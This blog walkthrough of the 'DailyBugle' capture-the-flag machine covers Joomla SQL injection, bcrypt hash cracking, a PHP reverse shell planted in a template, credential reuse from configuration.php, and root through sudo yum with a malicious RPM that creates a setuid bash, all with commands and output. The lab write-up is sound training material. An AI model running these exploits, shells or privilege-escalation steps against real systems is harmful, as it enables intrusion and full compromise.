BLOG

DailyBugle Walkthrough

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 20:52 IST
Initiating Ping Scan at 20:52
Scanning 10.10.231.212 [2 ports]
Completed Ping Scan at 20:52, 0.37s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:52
Completed Parallel DNS resolution of 1 host. at 20:52, 0.06s elapsed
DNS resolution of 1 IPs took 0.06s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 20:52
Scanning 10.10.231.212 [3 ports]
Discovered open port 80/tcp on 10.10.231.212
Discovered open port 22/tcp on 10.10.231.212
Discovered open port 3306/tcp on 10.10.231.212
Completed Connect Scan at 20:52, 0.37s elapsed (3 total ports)
Nmap scan report for 10.10.231.212
Host is up, received syn-ack (0.37s latency).
Scanned at 2021-07-04 20:52:41 IST for 1s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
3306/tcp open  mysql   syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.86 seconds
$ nmap -sV -sC -p22,80,3306 10.10.231.212
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 20:56 IST
Nmap scan report for 10.10.231.212
Host is up (0.37s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open  mysql   MariaDB (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds

Username Enumeration - CVE-2018-15473

Input Forms

Both the forms are not vulnerable to SQLi

homelogin

forgotuserpass

From Service scan, we got the server is running Joomla CMS

http-generator: Joomla! - Open Source Content Management

Lets check robots.txt for disallowed entries

http-robots.txt: 15 disallowed entries

# If the Joomla site is installed within a folder 
# eg www.example.com/joomla/ then the robots.txt file 
# MUST be moved to the site root 
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths. 
# eg the Disallow rule for the /administrator/ folder MUST 
# be changed to read 
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/orig.html
#
# For syntax checking, see:
# http://tool.motoricerca.info/robots-checker.phtml

User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

By Navigating to all the entries in robots.txt.

we can only access /administrator/ directory which is login page for joomla

joomlalogin

Let’s run the joomscan to get more information

$ joomscan -u http://10.10.231.212

joomlaversion

By running joomscan we got the version of joomla as 3.7.0

Let’s check for any public exploits

Jooma 3.7.0 is vulnerable to SQLI - CVE-2017-8917

Exploit code:

joomblah

By exploiting, we got username and hash

joomlahash

Extracting users from fb9j5_users
Found user ['811', 'Super User', 'jonah', '[email protected]', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']

Let’s find hash .

hash-identifier didn’t obtained the hash type.

Using hashcat hash examples. we got that, it is a bcrypt hash

hashcathashexamples

Let’s crack the hash

$ john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spiderman123     (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed
$ nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.231.212
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 22:30 IST
Nmap scan report for 10.10.231.212
Host is up (0.37s latency).

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MariaDB (unauthorized)
|_mysql-empty-password: Host 'eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
| mysql-enum:
|   Accounts: No valid accounts found
|_  Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.98 seconds

Nothing much from mariadb


Lets login to joomla using the credentials obtained in enumeration phase

we are greeted with control panel

joomlacontrolpanel

with search enginedorking, we can know that by manipulating the template in the Joomla control panel the access can be obtained

Navigate to Extensions> Templates > Templates in control panel

joomlatemplates

We have two templates.

Lets find what template is used by joomla

inspect

joomla is using protostar template

In Protostar template, edit index.php with reverse shell code pentest monkey revshell Save it and reload the home page.

prostarindex

We got the shell

shellaccess

Spawning TTY

sh-4.2$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.2$ ^Z
[1]  + 5783 suspended  nc -nlvp 9898

$ stty raw -echo; fg       
[1]  + 5783 continued  nc -nlvp 9898
bash-4.2$ export TERM=xterm
bash-4.2$ 

we dont have access to jjameson home directory to get user flag.

bash-4.2$ ls -l /home
total 0
drwx------. 2 jjameson jjameson 99 Dec 15  2019 jjameson

This web server is configured with mariadb database and to connect mariadb to php there will be configuration file in web directory lets check it.

bash-4.2$ cd /var/www/html
bash-4.2$ ls
LICENSE.txt    cli                includes   media       tmp
README.txt     components         index.php  modules     web.config.txt
administrator  configuration.php  language   plugins
bin            htaccess.txt       layouts    robots.txt
cache          images             libraries  templates
bash-4.2$ cat configuration.php
<?php
class JConfig {
        public $offline = '0';
        public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
        public $display_offline_message = '1';
        public $offline_image = '';
        public $sitename = 'The Daily Bugle';
        public $editor = 'tinymce';
        public $captcha = '0';
        public $list_limit = '20';
        public $access = '1';
        public $debug = '0';
        public $debug_lang = '0';
        public $dbtype = 'mysqli';
        public $host = 'localhost';
        public $user = 'root';
        public $password = 'nv5uz9r3ZEDzVjNu';
        public $db = 'joomla';
        public $dbprefix = 'fb9j5_';
        public $live_site = '';
        public $secret = 'UAMBRWzHO3oFPmVC';
        public $gzip = '0';
[...snip...]

Using obtained database credentials. Lets login to db for any juicy details

bash-4.2$ mysql -u root -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 305
Server version: 5.5.64-MariaDB MariaDB Server

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databaes;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'databaes' at line 1
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| mysql              |
| performance_schema |
| test               |
+--------------------+
5 rows in set (0.00 sec)

MariaDB [(none)]> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| fb9j5_assets                  |
| fb9j5_associations            |
| fb9j5_banner_clients          |
| fb9j5_banner_tracks           |
| fb9j5_banners                 |
|

[...snip...]

no juicy information obtained

Let’s use the same database password with users on target machine.

userflag

we got access for jjameson and user flag


Lets check for PrivEsc possibilities.

There is sudo permission for yum binary

sudoprivesc

Using information from gtfobins and fpm tool for escalating privileges

$ git clone https://github.com/jordansissel/fpm.git
$ cd fpm                              
$ sudo gem install fpm
$ sudo apt-get install rpm                              
$ printf '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod +s /tmp/bash' > root.sh              
$ ls
bin                 CONTRIBUTORS  fpm.gemspec  Makefile           README.rst       templates
Brewfile            Dockerfile    Gemfile      misc               root.sh          test
CHANGELOG.rst       docs          lib          NOTES.md           singularity.def  Vagrantfile
CODE_OF_CONDUCT.md  examples      LICENSE      notify-failure.sh  spec
$ mkdir junk                                         
$ fpm -n tmpbash -s dir -t rpm -a all --before-install ./root.sh ./junk  -> here -n is 'packagename' -s is 'typeofinputfile' -t is 'outputpackage' -a 'architecture'
Created package {:path=>"tmpbash-1.0-1.noarch.rpm"}
$ ls
bin                 Dockerfile   junk      NOTES.md           spec
Brewfile            docs         lib       notify-failure.sh  templates
CHANGELOG.rst       examples     LICENSE   README.rst         test
CODE_OF_CONDUCT.md  fpm.gemspec  Makefile  root.sh            tmpbash-1.0-1.noarch.rpm
CONTRIBUTORS        Gemfile      misc      singularity.def    Vagrantfile 
$ python3 -m http.server 8991              
Serving HTTP on 0.0.0.0 port 8991 (http://0.0.0.0:8991/) ...

Getting the root flag

wget http://<ip>:8991/tmpbash-1.0-1.noarch.rpm

roottxt